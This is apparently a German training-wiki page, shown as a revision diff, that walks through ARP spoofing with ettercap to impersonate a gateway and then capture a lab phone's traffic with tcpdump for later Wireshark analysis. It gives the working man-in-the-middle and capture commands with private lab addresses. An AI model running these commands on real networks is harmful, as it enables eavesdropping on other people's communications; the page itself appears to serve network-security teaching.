Arpspoofing mit Ettercap Gateway vorgauckeln: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 17: Zeile 17:
 
==Versuchsaufbau==
 
==Versuchsaufbau==
 
{{#drawio:telefon-gespraech-spoofing}}
 
{{#drawio:telefon-gespraech-spoofing}}
 +
 
==Vorgehensweise==
 
==Vorgehensweise==
 
*Wir müssen uns in der selben Broadcastdomain befinden.
 
*Wir müssen uns in der selben Broadcastdomain befinden.

Version vom 15. September 2023, 12:35 Uhr

benötigtes Paket

  • apt-get install ettercap-graphical
  • CLIENT=10.0.10.104
  • GATEWAY=10.0.10.1
  • INTERFACE=eth0

Befehl

  • ettercap -i $INTERFACE -Tq -M ARP /$CLIENT// /$GATEWAY//
optionen
-i eth0            =   Interface
-T                 =   Textmodus
-q                 =   still 
-M arp             =   ARP Spoofing

Telefongespräch mitschneiden

Versuchsaufbau

Vorgehensweise

  • Wir müssen uns in der selben Broadcastdomain befinden.
  • Wir starten eine Man in the Middle Attacke.
  • Sie wird über Arpspoofing umgesetzt.
  • Der Verkehr zum Telefon von Alice wird, mit tcpdump, komplett mitgeschnitten.
  • Wir werten ihn später mit wireshark aus.

Variablen

  • CLIENT=10.81.31.6
  • GATEWAY=10.81.0.1
  • INTERFACE=enp0s31f6

Attacke

  • ettercap -i $INTERFACE -Tq -M ARP /$CLIENT// /$GATEWAY//

Spoofing

  • sudo tcpdump -ni enp0s31f6 host 10.81.31.6 -s 1500 -w intercept.cap